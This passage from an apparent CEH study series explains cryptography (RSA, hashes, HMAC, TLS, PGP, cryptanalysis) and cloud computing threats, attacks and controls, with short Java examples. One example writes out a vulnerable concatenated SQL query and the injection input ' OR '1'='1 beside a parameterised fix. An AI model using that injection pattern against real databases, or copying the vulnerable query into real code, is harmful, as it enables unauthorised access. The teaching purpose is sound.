  • Validity: The validity period of the certificate, marked by its expiration date and time.

RSA

RSA is an encryption algorithm, used to securely transmit messages over the internet. It is based on the principle that it is easy to multiply large numbers, but factoring large numbers is very difficult. For example, it is easy to check that 31 and 37 multiply to 1147, but trying to find the factors of 1147 is a much longer process.

RSA is an example of public-key cryptography, which is illustrated by the following example: Suppose Alice wishes to send Bob a valuable diamond, but the jewel will be stolen if sent unsecured. Both Alice and Bob have a variety of padlocks, but they don't own the same ones, meaning that their keys cannot open the other's locks. The solution is for Bob to send Alice one of his open padlocks (his public key); Alice locks the box with it and only Bob, who keeps the matching key (his private key), can open it.

In RSA, the public key is generated by multiplying two large prime numbers p and q together, and the private key is generated through a different process involving p and q. A user can then distribute his public key pq, and anyone wishing to send the user a message would encrypt their message using the public key. For all practical purposes, even computers cannot factor large numbers into the product of two primes, in the same way that factoring a number like 414863 by hand is virtually impossible.

The implementation of RSA makes heavy use of modular arithmetic, Euler’s theorem, and Euler’s totient function. Notice that each step of the algorithm only involves multiplication, so it is easy for a computer to perform:

  1. First, the receiver chooses two large prime numbers p and q. Their product, n = pq, will be half of the public key.
  2. The receiver calculates ϕ(pq) = (p−1)(q−1) and chooses a number e relatively prime to ϕ(pq). In practice, e is often chosen to be (2^16) + 1 = 65537, though it can be as small as 3 in some cases. e will be the other half of the public key.
  3. The receiver calculates the modular inverse d of e modulo ϕ(n). In other words, de ≡ 1 (mod ϕ(n)). d is the private key.
  4. The receiver distributes both parts of the public key: n and e. d is kept secret.

Now that the public and private keys have been generated, they can be reused as often as wanted. To transmit a message, follow these steps:

  1. First, the sender converts his message into a number m. One common conversion process uses the ASCII alphabet:
    1. For example, the message “HELLO” would be encoded as 7269767679. It is important that m<n, as otherwise the message will be lost when taken modulo n, so if n is smaller than the message, it will be sent in pieces.
  2. The sender then calculates c ≡ m^e (mod n). c is the ciphertext or the encrypted message. Besides the public key, this is the only information an attacker will be able to steal.
  3. The receiver computes c^d ≡ m (mod n), thus retrieving the original number m.
  4. The receiver translates m back into letters, retrieving the original message.

Note that step 3 makes use of Euler’s theorem.

ASCII table for step 1.
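
A toy walk-through of the steps above with tiny primes (real keys use primes that are hundreds of digits long, and real code should use the java.security APIs instead):

import java.math.BigInteger;

public class TextbookRsa {

    public static void main(String[] args) {
        // Step 1: the receiver chooses two primes p and q; n = pq is half of the public key
        BigInteger p = BigInteger.valueOf(61);
        BigInteger q = BigInteger.valueOf(53);
        BigInteger n = p.multiply(q);                                                     // 3233

        // Step 2: phi(n) = (p - 1)(q - 1), and e is chosen relatively prime to phi(n)
        BigInteger phi = p.subtract(BigInteger.ONE).multiply(q.subtract(BigInteger.ONE)); // 3120
        BigInteger e = BigInteger.valueOf(17);

        // Step 3: d is the modular inverse of e modulo phi(n); d is the private key
        BigInteger d = e.modInverse(phi);                                                 // 2753

        // Sender: encrypt m as c = m^e mod n (m must be smaller than n)
        BigInteger m = BigInteger.valueOf(65);
        BigInteger c = m.modPow(e, n);

        // Receiver: compute c^d mod n, recovering the original m
        System.out.println(c.modPow(d, n));                                               // prints 65
    }
}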

Message Digest (One-Way Hash) Functions

A message digest is a fixed-size string of digits created by a one-way cryptographic hash function.

Message digests are designed to protect the integrity of a piece of data or media to detect changes and alterations to any part of a message. They are a type of cryptography utilizing hash values that can warn the copyright owner of any modifications applied to their work.

Message digest hash numbers represent specific files containing the protected works. One message digest is assigned to particular data content. It can reference a change made deliberately or accidentally, but it prompts the owner to identify the modification as well as the individual(s) making the change. Message digests are algorithmic numbers.

This term is also known as a hash value and sometimes as a checksum.

The message digest is a unique fixed-size bit string that is calculated in such a way that, if a single bit of the input is modified, on average half of the bits of the message digest value change.

Message Digest Function (MD5)

The MD5 function is a cryptographic algorithm that takes an input of arbitrary length and produces a message digest that is 128 bits long. The digest is sometimes also called the “hash” or “fingerprint” of the input. MD5 is used in many situations where a potentially long message needs to be processed and/or compared quickly. The most common application is the creation and verification of digital signatures.

MD5 was designed by the well-known cryptographer Ronald Rivest in 1991. In 2004, some serious flaws were found in MD5 and, today, it is no longer considered suitable for purposes that require collision resistance, such as digital signatures.

Secure Hashing Algorithm (SHA)

Secure Hash Algorithms (SHA) are a family of cryptographic functions designed to keep data secured. It works by transforming the data using a hash function: an algorithm that consists of bitwise operations, modular additions, and compression functions. The hash function then produces a fixed-size string that looks nothing like the original. These algorithms are designed to be one-way functions, meaning that once they are transformed into their respective hash values, it is virtually impossible to transform them back into the original data. A few algorithms of interest are SHA-1, SHA-2, and SHA-3, each of which was successively designed with increasingly stronger encryption in response to hacker attacks. SHA-0, for instance, is now obsolete due to the widely exposed vulnerabilities.

SHA-1 produces 160-bit hash values. SHA-2 is a group of different hash functions including SHA-256, SHA-384 and SHA-512.
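
As a quick illustration with the JDK, computing MD5 and SHA digests of the same input could look like this; changing a single character of the input produces completely different values:

import java.math.BigInteger;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

public class DigestExample {

    public static void main(String[] args) throws Exception {
        byte[] input = "The quick brown fox".getBytes(StandardCharsets.UTF_8);

        for (String algorithm : new String[]{"MD5", "SHA-1", "SHA-256"}) {
            byte[] digest = MessageDigest.getInstance(algorithm).digest(input);
            // Print each digest as a hexadecimal string
            System.out.printf("%-8s %s%n", algorithm, new BigInteger(1, digest).toString(16));
        }
    }
}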

Hashed Message Authentication Code (HMAC)

A hashed message authentication code (HMAC) is a message authentication code that makes use of a cryptographic key along with a hash function. The actual algorithm behind a hashed message authentication code is complicated, with hashing being performed twice. This helps in resisting some forms of cryptographic analysis. A hashed message authentication code is considered to be more secure than other similar message authentication codes, as the data transmitted and key used in the process are hashed separately.
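
A minimal sketch of computing an HMAC with the JDK, assuming a secret key shared between sender and receiver:

import java.math.BigInteger;
import java.nio.charset.StandardCharsets;

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class HmacExample {

    public static void main(String[] args) throws Exception {
        byte[] sharedKey = "a-shared-secret-key".getBytes(StandardCharsets.UTF_8);

        // Same message + same key always produce the same code,
        // so the receiver can verify both integrity and origin
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(sharedKey, "HmacSHA256"));

        byte[] code = mac.doFinal("message to authenticate".getBytes(StandardCharsets.UTF_8));
        System.out.println(new BigInteger(1, code).toString(16));
    }
}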

Secure Shell (SSH)

Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. Typical applications include remote command-line, login, and remote command execution, but any network service can be secured with SSH.

SSH provides a secure channel over an unsecured network by using client-server architecture, connecting an SSH client application with an SSH server. The protocol specification distinguishes between two major versions, referred to as SSH-1 and SSH-2. The standard TCP port for SSH is 22.

The Secure Shell protocol consists of three major components:

  • The Transport Layer Protocol (SSH-TRANS) provides server authentication, confidentiality and integrity. It may optionally also provide compression. The transport layer will typically run over a TCP/IP connection, but might also run over any other reliable data stream.
  • The User Authentication Protocol (SSH-USERAUTH) authenticates the client-side user to the server. It runs over the transport layer protocol.
  • The Connection Protocol (SSH-CONNECT) multiplexes the encrypted tunnel into several logical channels. It runs over the user authentication protocol.

Public Key Infrastructure

Public Key Infrastructure (PKI) is a combination of policies, procedures, hardware, software and people that are required to create, manage and revoke digital certificates.

Public and Private Key Pair

Public and private keys work as a pair to enforce the encryption and decryption process. The public key can be provided to anyone and the private key must be kept secret.

Both directions are valid: using the public key to encrypt and the private key to decrypt, or the opposite, where the private key is used for encryption and the public key for decryption. Both ways have different applications.

Certification Authorities

A Certification Authority (CA) is a computer or entity that creates and issues digital certificates. Information like the IP address, fully qualified domain name and public key is present on these certificates. CAs also assign serial numbers to the digital certificates and sign the certificates with their digital signature.

Root Certificate

Root certificates provide the public key and other details of CAs. Different operating systems store root certificates in different ways.

Identity Certificate

The purpose of identity certificates is similar to root certificates but they cover client computers or devices. For example, a router or a web server that wants to make SSL connections with other peers.

Signed Certificate Vs. Self-Signed Certificate

A self-signed certificate is a public key certificate that is signed and validated by the same entity. It means that the certificate is signed with its own private key and no third party vouches for the identity of the organization or person that performs the signing process.

A signed certificate is supported by a reputable third-party certificate authority (CA). The issue of a signed certificate requires verification of domain ownership, legal business documents, and other essential technical perspectives. To establish a certificate chain, the certificate authority also issues a certificate for itself, a root certificate.

Email Encryption

Digital Signature

Digital signatures are used to validate the authenticity of digital documents. They identify the author of the document and the date and time of signing, and they authenticate the content of the message.

There are two categories of digital signatures:

  • Direct digital signature: A direct digital signature involves only two parties, one to send the message and another one to receive it. Direct digital signatures assume that both parties trust each other and know each other's public keys. The messages are more prone to tampering and the sender can deny having sent the message at any time.
  • Arbitrated Digital Signature: An arbitrated digital signature includes three parties: the sender, the receiver and an arbiter who becomes the medium for sending and receiving the messages between them. The messages are less prone to tampering because a timestamp is included by default.

Secure Sockets Layer

Secure Sockets Layer (SSL) is a standard security technology for establishing an encrypted link between a server and a client—typically a web server (website) and a browser, or a mail server and a mail client (e.g., Outlook).

SSL allows sensitive information such as credit card numbers, social security numbers, and login credentials to be transmitted securely. Normally, data sent between browsers and web servers is sent in plain text – leaving you vulnerable to eavesdropping. If an attacker is able to intercept all data being sent between a browser and a web server, they can see and use that information.

More specifically, SSL is a security protocol. Protocols describe how algorithms should be used. In this case, the SSL protocol determines variables of the encryption for both the link and the data being transmitted.

All browsers have the capability to interact with secured web servers using the SSL protocol. However, the browser and the server need what is called an SSL Certificate to be able to establish a secure connection.

SSL and TLS for Secure Communication

A popular implementation of public-key encryption is the Secure Sockets Layer (SSL). Originally developed by Netscape, SSL is an Internet security protocol used by Internet browsers and Web servers to transmit sensitive information. SSL has become part of an overall security protocol known as Transport Layer Security (TLS).

TLS and its predecessor SSL make significant use of certificate authorities. Once your browser requests a secure page and adds the "s" onto "http", it receives the server's public key and certificate and checks three things:

  1. The certificate comes from a trusted party.
  2. The certificate is currently valid.
  3. The certificate has a relationship with the site from which it is coming.

The following are some important functionalities SSL/TLS has been designed for:

  • Server authentication to client and vice versa.
  • Select a common cryptographic algorithm.
  • Generate shared secrets between peers.
  • Protection of normal TCP/UDP connection.

How SSL/TLS works

These are the essential principles to grasp for understanding how SSL/TLS works:

  • Secure communication begins with a TLS handshake, in which the two communicating parties open a secure connection and exchange the public key.
  • During the TLS handshake, the two parties generate session keys, and the session keys encrypt and decrypt all communications after the TLS handshake.
  • Different session keys are used to encrypt communications in each new session.
  • TLS ensures that the party on the server-side, or the website the user is interacting with, is actually who they claim to be.
  • TLS also ensures that data has not been altered, since a message authentication code (MAC) is included with transmissions.

With TLS, both HTTP data that users send to a website (by clicking, filling out forms, etc.) and the HTTP data that websites send to users is encrypted. Encrypted data has to be decrypted by the recipient using a key.

TLS handshake

TLS communication sessions begin with a TLS handshake. A TLS handshake uses something called asymmetric encryption, meaning that two different keys are used on the two ends of the conversation. This is possible because of a technique called public-key cryptography.

In public-key cryptography, two keys are used: a public key, which the server makes available publicly, and a private key, which is kept secret and only used on the server-side. Data encrypted with the public key can only be decrypted with the private key and vice versa.

During the TLS handshake, the client and server use the public and private keys to exchange randomly generated data, and this random data is used to create new keys for encryption, called the session keys.

Pretty Good Privacy

Pretty Good Privacy (PGP) is a type of encryption program for online communication channels. The method was introduced in 1991 by Phil Zimmermann, a computer scientist and cryptographer. PGP offers authentication and privacy protection in files, emails, disk partitions and digital signatures and has been dubbed the closest thing to military-grade encryption. PGP encrypts the contents of e-mail messages using a combination of different methods. PGP uses hashing, data compression, symmetric encryption, and asymmetric encryption. In addition to e-mail encryption, PGP also supports the use of a digital signature to verify the sender of an e-mail.

OpenPGP is the most widely applied standard when it comes to modern PGP practices. OpenPGP programs allow users to encrypt private and confidential messages before uploading or downloading content from a remote server. This prevents cybersecurity threats from the open channels of the Internet.

Disk Encryption

Disk encryption covers the encryption of a disk to secure files and directories by converting them into an encrypted format. Disk encryption encrypts every bit on a disk to prevent unauthorised access to data storage.

The standard process for booting up an operating system is that the first section of the disk, called the master boot record, instructs the system where to read the first file that begins the instructions for loading the operating system.

When disk encryption is installed, the contents of the disk, except the master boot record and a small system that it loads, are encrypted using any suitable modern symmetric cypher by a secret key. The master boot record is modified to first load this small system, which can validate authentication information from the user.

Cryptography Attacks

Cryptographic attacks aim to recover the encryption keys. The process of finding vulnerabilities in code, encryption algorithms or key management schemes is called cryptanalysis.

There are different attacks that can be applied in order to recover an encryption key:

  • Known-plaintext attacks: They are applied when the cryptanalyst has access to the plaintext message and its corresponding ciphertext and seeks to discover a correlation between them.
  • Cyphertext-only attacks: Cryptanalysts only have access to the ciphertexts and they try to extract the plaintext or the key by analysing them. Frequency analysis, for example, is a great tool for this.
  • Chosen-plaintext attacks: A chosen-plaintext attack (CPA) is a model for cryptanalysis which assumes that the attacker can choose random plaintexts to be encrypted and obtain the corresponding ciphertexts. The goal of the attack is to gain some further information which reduces the security of the encryption scheme. In the worst case, a chosen-plaintext attack could expose secret information after calculating the secret key. Two forms of chosen-plaintext attack can be distinguished:
    • Batch chosen-plaintext attack, where the cryptanalyst chooses all plaintexts before any of them are encrypted. This is often what is meant by "chosen-plaintext attack" when it is not further qualified.
    • Adaptive chosen-plaintext attack, where the cryptanalyst makes a series of interactive queries, choosing subsequent plaintexts based on the information from the previous encryptions.
  • Chosen-ciphertext attacks: A cryptanalyst can analyse any chosen ciphertexts together with their corresponding plaintexts. The goal is to acquire the secret key or to get as much information about the attacked system as possible.
  • Adaptive-chosen-ciphertext attacks: The adaptive-chosen-ciphertext attack is a kind of chosen-ciphertext attack during which an attacker can make the attacked system decrypt many different ciphertexts, where the new ciphertexts are created based on the responses (plaintexts) received previously.
  • Adaptive-chosen-plaintext attacks: An adaptive-chosen-plaintext attack is a chosen-plaintext attack scenario in which the attacker has the ability to make his or her choice of the inputs to the encryption function based on the previous chosen-plaintext queries and their corresponding ciphertexts.
  • Rubber hose attacks: The rubber hose attack consists of extracting secrets from people by the use of torture or coercion. Other means include governmental and corporate influence over other sub-entities.

Code Breaking Methodologies

Some examples of methodologies that can help to break encryptions are:

  • Brute force
  • One-time pad
  • Frequency analysis

CEH (XX): Cloud Computing

The index of this series of articles can be found here.

Cloud computing has two meanings. The most common refers to running workloads remotely over the internet in a commercial provider’s data centre, also known as the “public cloud” model. Popular public cloud offerings such as Amazon Web Services (AWS), Google Cloud Platform (GCP) and Microsoft Azure, all exemplify this familiar notion of cloud computing. Today, most businesses take a multi-cloud approach, which simply means they use more than one public cloud service.

The second meaning of cloud computing describes how it works: a virtualized pool of resources from raw compute power to application functionality, available on demand. When customers procure cloud services, the provider fulfils those requests using advanced automation rather than manual provisioning. The key advantage is agility: the ability to apply abstracted compute, storage, and network resources to workloads as needed and tap into an abundance of pre-built services. Major characteristics of cloud computing include:

  • On-demand self-service
  • Distributed storage
  • Rapid elasticity
  • Measured services
  • Automated management
  • Virtualisation

Types of Cloud Computing Services

The array of available cloud computing services is vast, but most fall into one of the following categories:

SaaS (Software as a Service)

This type of public cloud computing delivers applications over the internet through the browser. The most popular SaaS applications for business can be found in Google’s G Suite and Microsoft’s Office 365; among enterprise applications, Salesforce leads the pack. But virtually all enterprise applications, including ERP suites from Oracle and SAP, have adopted the SaaS model. Typically, SaaS applications offer extensive configuration options as well as development environments that enable customers to code their own modifications and additions.

IaaS (Infrastructure as a Service)

At a basic level, IaaS public cloud providers offer storage and compute services on a pay-per-use basis. But the full array of services offered by all major public cloud providers is staggering: highly scalable databases, virtual private networks, big data analytics, developer tools, machine learning, application monitoring, and so on. Amazon Web Services was the first IaaS provider and remains the leader, followed by Microsoft Azure, Google Cloud Platform, and IBM Cloud.

PaaS (Platform as a Service)

PaaS provides sets of services and workflows that specifically target developers, who can use shared tools, processes, and APIs to accelerate the development, testing, and deployment of applications. Salesforce’s Heroku and Force.com are popular public cloud PaaS offerings; Pivotal’s Cloud Foundry and Red Hat’s OpenShift can be deployed on-premises or accessed through the major public clouds. For enterprises, PaaS can ensure that developers have ready access to resources, follow certain processes, and use only a specific array of services, while operators maintain the underlying infrastructure.

FaaS (Functions as a Service)

FaaS, the cloud version of serverless computing, adds another layer of abstraction to PaaS so that developers are completely insulated from everything in the stack below their code. Instead of futzing with virtual servers, containers, and application runtimes, they upload narrowly functional blocks of code and set them to be triggered by a certain event (such as a form submission or uploaded file). All the major clouds offer FaaS on top of IaaS: AWS Lambda, Azure Functions, Google Cloud Functions, and IBM OpenWhisk. A special benefit of FaaS applications is that they consume no IaaS resources until an event occurs, reducing pay-per-use fees.

Cloud Deployment Models

Public Cloud

In a public cloud, individual businesses share access to basic computer infrastructure (servers, storage, networks, development platforms etc.) provided by a CSP. Each company shares the CSP's infrastructure with the other companies that have subscribed to the cloud. Payment is usually pay-as-you-go with no minimum time requirements. Some CSPs derive revenue from advertising and offer free public clouds.

Public clouds are usually based on massive hardware installations distributed in locations throughout the country or across the globe. Their size enables economies of scale that permit maximum scalability to meet requirements as a company’s needs expand or contract, maximum flexibility to meet surges in demand in real-time, and maximum reliability in case of hardware failures.

Public clouds are highly cost-effective because the business only pays for the computer resources it uses. In addition, the business has access to state-of-the-art computer infrastructure without having to purchase it and hire IT staff to install and maintain it.

The main disadvantage of public clouds is that advanced security and privacy provisions are beyond their capabilities. For example, public clouds cannot meet many regulatory compliance requirements because their tenants share the same computer infrastructure. In addition, large CSPs often implement their public clouds on hardware installations located outside the United States, which may be a concern for some businesses.

Public clouds are well suited for hosting development platforms or web servers, for big data processing that places heavy demands on computer resources, and for companies that do not have advanced security concerns.

Private Cloud

In a private cloud, a business has access to infrastructure in the cloud that is not shared with anyone else. The business typically deploys its own platforms and software applications on the cloud infrastructure. The business’s infrastructure usually lies behind a firewall that is accessed through the company intranet over encrypted connections. Payment is often based on a fee-per-unit-time model.

Private clouds have the significant advantage of being able to provide enhanced levels of security and privacy because computer infrastructure is dedicated to a single client. Sarbanes Oxley, PCI and HIPAA compliance are all possible in a private cloud. In addition, private cloud CSPs are more likely to customize the cloud to meet a company’s needs.

An important disadvantage of private clouds for some companies is that the company is responsible for managing their own development platforms and software applications on the CSP’s infrastructure. While this gives the business substantial control on the software side, it comes at the cost of having to employ IT staff that can handle the company’s cloud deployment. Recognizing this disadvantage, some CSPs provide software applications and a virtual desktop within a company’s private cloud.

Private clouds have the additional disadvantages that they tend to be more expensive and the company is limited to using the infrastructure specified in their contract with the CSP.

Hybrid Cloud

In a hybrid cloud, a company’s cloud deployment is split between public and private cloud infrastructure. Sensitive data remains within the private cloud where high-security standards can be maintained. Operations that do not make use of sensitive data are carried out in the public cloud where infrastructure can scale to meet demands and costs are reduced.

Hybrid clouds are well suited to carrying out big data operations on non-sensitive data in the public cloud while keeping sensitive data protected in the private cloud. Hybrid clouds also give companies the option of running their public-facing applications or their capacity intensive development platforms in the public portion of the cloud while their sensitive data remains protected.

Community Cloud

Community clouds are a recent variation on the private cloud model that provide a complete cloud solution for specific business communities. Businesses share infrastructure provided by the CSP for software and development tools that are designed to meet community needs. In addition, each business has its own private cloud space that is built to meet the security, privacy and compliance needs that are common in the community.

Community clouds are an attractive option for companies in the health, financial or legal spheres that are subject to strict regulatory compliance. They are also well-suited to managing joint projects that benefit from sharing community-specific software applications or development platforms.

The recent development of community clouds illustrates how cloud computing is evolving. CSPs can combine different types of clouds with different service models to provide businesses with attractive cloud solutions that meet a company’s needs.

NIST Cloud Computing Reference Architecture

The NIST cloud computing reference architecture defines five major actors: cloud consumer, cloud provider, cloud carrier, cloud auditor and cloud broker. Each actor is an entity (a person or an organization) that participates in a transaction or process and/or performs tasks in cloud computing. This reference architecture is based on recommendations of the National Institute of Standards and Technology.

NIST Reference Model
  • Cloud Consumer: A person or organization that maintains a business relationship with, and uses service from, Cloud Providers.
  • Cloud Provider: A person, organization or entity responsible for making a service available to interested parties.
  • Cloud Auditor: A party that can conduct an independent assessment of cloud services, information system operations, performance and security of the cloud implementation.
  • Cloud Broker: An entity that manages the use, performance and delivery of cloud services, and negotiates relationships between Cloud Providers and Cloud Consumers.
  • Cloud Carrier: An intermediary that provides connectivity and transport of cloud services from Cloud Providers to Cloud Consumers.

The paper can be consulted here.

Cloud Computing Benefits

There are multiple benefits offered by cloud computing, some of them are:

  • Cost Savings: Cost saving is the biggest benefit of cloud computing. It helps organisations to save substantial capital cost as it does not need any physical hardware investments. Also, they do not need trained personnel to maintain the hardware. The buying and managing of equipment are done by the cloud service provider.
  • Security: A cloud host’s full-time job is to carefully monitor security, which is significantly more efficient than a conventional in-house system, where an organization must divide its efforts between a myriad of IT concerns, with security being only one of them.
  • Flexibility: By relying on an outside organization to take care of all IT hosting and infrastructure, organisations will have more time to devote toward the aspects of their business that directly affect their bottom line.
  • Mobility: Cloud computing allows mobile access to corporate data via smartphones and devices, which, considering over 2.6 billion smartphones are being used globally today, is a great way to ensure that no one is ever left out of the loop.
  • Quality Control: In a cloud-based system, all documents are stored in one place and in a single format. With everyone accessing the same information, you can maintain consistency in data, avoid human error, and have a clear record of any revisions or updates.
  • Disaster Recovery: Cloud-based services provide quick data recovery for all kinds of emergency scenarios, from natural disasters to power outages.
  • Loss Prevention: With a cloud-based server, all the information employees have uploaded to the cloud remains safe and easily accessible from any computer with an internet connection, even if the computer they regularly use is not working.
  • Automatic Software Updates: Cloud-based applications automatically refresh and update themselves, instead of forcing an IT department to perform a manual organization-wide update.

Virtualisation

Virtualisation creates a simulated or virtual, computing environment as opposed to a physical environment. Virtualisation often includes computer-generated versions of hardware, operating systems, storage devices and more. This allows organisations to partition a single physical computer or server into several virtual machines. Each virtual machine can then interact independently and run different operating systems or applications while sharing the resources of a single host machine.

By creating multiple resources from a single computer or server, virtualisation improves scalability and workloads while resulting in the use of fewer overall servers, less energy consumption and fewer infrastructure costs and maintenance. There are four main categories that virtualisation falls into. The first is desktop virtualisation, which allows one centralised server to deliver and manage individualised desktops. The second is network virtualisation, designed to split network bandwidth into independent channels to then be assigned to specific servers or devices. The third category is software virtualisation, which separates applications from the hardware and operating system. And the fourth is storage virtualisation, which combines multiple network storage resources into a single storage device which multiple users can access.

Key Properties of Virtual Machines

VMs have the following characteristics, which offer several benefits.

  • Partitioning: Run multiple operating systems on one physical machine and divide system resources between the virtual machines.
  • Isolation: Provide fault and security isolation at the hardware level and preserve performance with advanced resource controls.
  • Encapsulation: Save the entire state of a virtual machine to files and move and copy virtual machines as easily as moving and copying files.
  • Hardware Independence: Provision or migrate any virtual machine to any physical server.

Types of Virtualization

  • Server Virtualization: Server virtualization enables multiple operating systems to run on a single physical server as highly efficient virtual machines.
  • Network Virtualization: By completely reproducing a physical network, network virtualization allows applications to run on a virtual network as if they were running on a physical network — but with greater operational benefits and all the hardware independencies of virtualization.
  • Desktop Virtualization: Deploying desktops as a managed service enables IT organizations to respond faster to changing workplace needs and emerging opportunities.

Virtualization vs. Cloud Computing

Although equally buzz-worthy technologies, virtualization and cloud computing are not interchangeable. Virtualization is software that makes computing environments independent of physical infrastructure, while cloud computing is a service that delivers shared computing resources (software and/or data) on-demand via the Internet. As complementary solutions, organizations can begin by virtualizing their servers and then moving to cloud computing for even greater agility and self-service.

Cloud Computing Threats

  • Data breaches
  • Weak identity, credential and access management
  • Insecure interfaces and APIs
  • System and application vulnerability
  • Account hijacking
  • Malicious insiders
  • Advanced persistent threats
  • Data loss
  • Insufficient due diligence
  • Abuse and nefarious use of cloud services
  • Denial of service
  • Shared technology issues

Cloud Computing Attacks

Cloud malware injection attacks

Malware injection attacks are done to take control of a user’s information in the cloud. For this purpose, hackers add an infected service implementation module to a SaaS or PaaS solution or a virtual machine instance to an IaaS solution. If the cloud system is successfully deceived, it will redirect the cloud user’s requests to the hacker’s module or instance, initiating the execution of malicious code. Then the attacker can begin their malicious activity such as manipulating or stealing data or eavesdropping.

The most common forms of malware injection attacks are cross-site scripting attacks and SQL injection attacks. During a cross-site scripting attack, hackers add malicious scripts (Flash, JavaScript, etc.) to a vulnerable web page. German researchers arranged an XSS attack against the Amazon Web Services cloud computing platform in 2011. In the case of SQL injection, attackers target SQL servers with vulnerable database applications. In 2008, Sony’s PlayStation website became the victim of a SQL injection attack.
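
As a quick illustration of why SQL injection works, the following sketch contrasts building a query by string concatenation with a parameterised JDBC query. The table and column names are made up, and obtaining a real database Connection from a driver is left out; the unsafe variant lets an input such as ' OR '1'='1 change the meaning of the query, while the parameterised variant treats it as plain data:

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class LoginQueries {

    // Vulnerable: the user-controlled value becomes part of the SQL text,
    // so ' OR '1'='1 turns the WHERE clause into a tautology.
    static ResultSet unsafeLookup(Connection conn, String username) throws SQLException {
        String sql = "SELECT * FROM users WHERE username = '" + username + "'";
        Statement stmt = conn.createStatement();
        return stmt.executeQuery(sql);
    }

    // Safer: the value is bound as a parameter and never interpreted as SQL.
    static ResultSet safeLookup(Connection conn, String username) throws SQLException {
        PreparedStatement stmt =
                conn.prepareStatement("SELECT * FROM users WHERE username = ?");
        stmt.setString(1, username);
        return stmt.executeQuery();
    }
}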

Abuse of cloud services

Hackers can use cheap cloud services to arrange DoS and brute force attacks on target users, companies, and even other cloud providers. For instance, security experts Bryan and Anderson arranged a DoS attack by exploiting capacities of Amazon’s EC2 cloud infrastructure in 2010. As a result, they managed to make their client unavailable on the internet by spending only $6 to rent virtual services.

An example of a brute force attack was demonstrated by Thomas Roth at the 2011 Black Hat Technical Security Conference. By renting servers from cloud providers, hackers can use powerful cloud capacities to send thousands of possible passwords to a target user’s account.

Denial of service attacks

DoS attacks are designed to overload a system and make services unavailable to its users. These attacks are especially dangerous for cloud computing systems, as many users may suffer as the result of flooding even a single cloud server. In the case of high workload, cloud systems begin to provide more computational power by involving more virtual machines and service instances. While trying to prevent a cyberattack, the cloud system actually makes it more devastating. Finally, the cloud system slows down and legitimate users lose access to their cloud services. In the cloud environment, DDoS attacks may be even more dangerous if hackers use more zombie machines to attack a large number of systems.

Side-channel attacks

A side-channel attack is arranged by hackers when they place a malicious virtual machine on the same host as the target virtual machine. During a side-channel attack, hackers target system implementations of cryptographic algorithms. However, this type of threat can be avoided with secure system design.

Wrapping attacks

A wrapping attack is an example of a man-in-the-middle attack in the cloud environment. Cloud computing is vulnerable to wrapping attacks because cloud users typically connect to services via a web browser. An XML signature is used to protect users’ credentials from unauthorized access, but this signature does not secure the positions in the document. Thus, XML signature element wrapping allows attackers to manipulate an XML document.

For example, a vulnerability was found in the SOAP interface of Amazon Elastic Cloud Computing (EC2) in 2009. This weakness allowed attackers to modify an eavesdropped message as a result of a successful signature wrapping attack.

Man-in-the-cloud attacks

During this type of attack, hackers intercept and reconfigure cloud services by exploiting vulnerabilities in the synchronization token system so that during the next synchronization with the cloud, the synchronization token will be replaced with a new one that provides access to the attackers. Users may never know that their accounts have been hacked, as an attacker can put back the original synchronization tokens at any time. Moreover, there’s a risk that compromised accounts will never be recovered.

Insider attacks

An insider attack is initiated by a legitimate user who is purposefully violating the security policy. In a cloud environment, an attacker can be a cloud provider administrator or an employee of a client company with extensive privileges. To prevent the malicious activity of this type, cloud developers should design secure architectures with different levels of access to cloud services.

Account or service hijacking

Account or service hijacking is achieved after gaining access to a user’s credentials. There are various techniques for achieving this, from phishing to spyware to cookie poisoning. Once a cloud account has been hacked, attackers can obtain a user’s personal information or corporate data and compromise cloud computing services. For instance, an employee of Salesforce, a SaaS vendor, became the victim of a phishing scam which led to the exposure of all of the company’s client accounts in 2007.

Advanced persistent threats (APTs)

APTs are attacks that let hackers continuously steal sensitive data stored in the cloud or exploit cloud services without being noticed by legitimate users. The duration of these attacks allows hackers to adapt to security measures against them. Once unauthorized access is established, hackers can move through data centre networks and use network traffic for their malicious activity.

New attacks: Spectre and Meltdown

These two types of cyberattacks appeared in early 2018 and have already become a new threat to cloud computing. With the help of malicious JavaScript code, adversaries can read encrypted data from memory by exploiting a design weakness in most modern processors. Both Spectre and Meltdown break the isolation between applications and the operating system, letting attackers read information from the kernel. This is a real headache for cloud developers, as not all cloud users install the latest security patches.

Cloud Security

Cloud computing security refers to the security implementations, deployment and preventions to defend against security threats.

Cloud Security Control Layers

  • Application layer: All the controls that can be added at the application level, including those that can be deployed together with an application, like web application firewalls, and those included in the system development life cycle, like code analysis, online secure transactions, script analysis, etc.
  • Information layer: At this layer, mechanisms to provide confidentiality and integrity are implemented, together with different policies to monitor data loss and content management, preventing data leakage and enforcing compliance with rules and regulations.
  • Management layer: Governance, risk management, compliance, identity and access management, and patch and configuration management help control secure access to the organisation’s resources and manage them.
  • Network layer: Anything that can be applied at the network level, like IDS/IPS, firewalls and other tools already discussed in previous chapters to secure networks.
  • Trust computing: The Root of Trust (RoT) is established by validating each component of hardware and software from the end entity up to the root certificate. It is intended to ensure that only trusted software and hardware can be used while still retaining flexibility.
  • Computer and storage: Integrity checks, file system monitoring, log file analysis, connection analysis, encryption, etc. are solutions normally deployed for the protection of resources.
  • Physical security: Prevention and protection against physical damage, theft, unauthorised physical access and environmental disasters are things to consider when securing resources.

Responsibilities in Cloud Security

Cloud Service Provider

Responsibilities of a cloud service provider include:

  • Web applications firewalls (WAF)
  • Real traffic grabber (RTG)
  • Firewall
  • Intrusion prevention systems
  • Secure web gateway (SWG)
  • Application security (App Sec)
  • Virtual private networks (VPN)
  • CoS/QoS
  • Trusted platform module
  • Netflow and others

Cloud Service Consumer

Responsibilities of a cloud service consumer include:

  • Public key infrastructure (PKI)
  • Security development life cycle (SDLC)
  • Web application firewall (WAF)
  • Firewall
  • Encryption
  • Intrusion prevention system
  • Secure web gateway
  • Application security
  • Virtual private networks and others

Cloud Computing Security Considerations

  • Software configuration management
  • Disaster recovery plan
  • Strong key generation
  • Patching and updates
  • AICPA SAS 70 type audits
  • Data integrity
  • Load balancing
  • Backup
  • VPN
  • SSL
  • Cryptography implementation
  • Strong AAA mechanism
  • Reliability
  • Quality of service (QoS)
  • Prohibit credential sharing
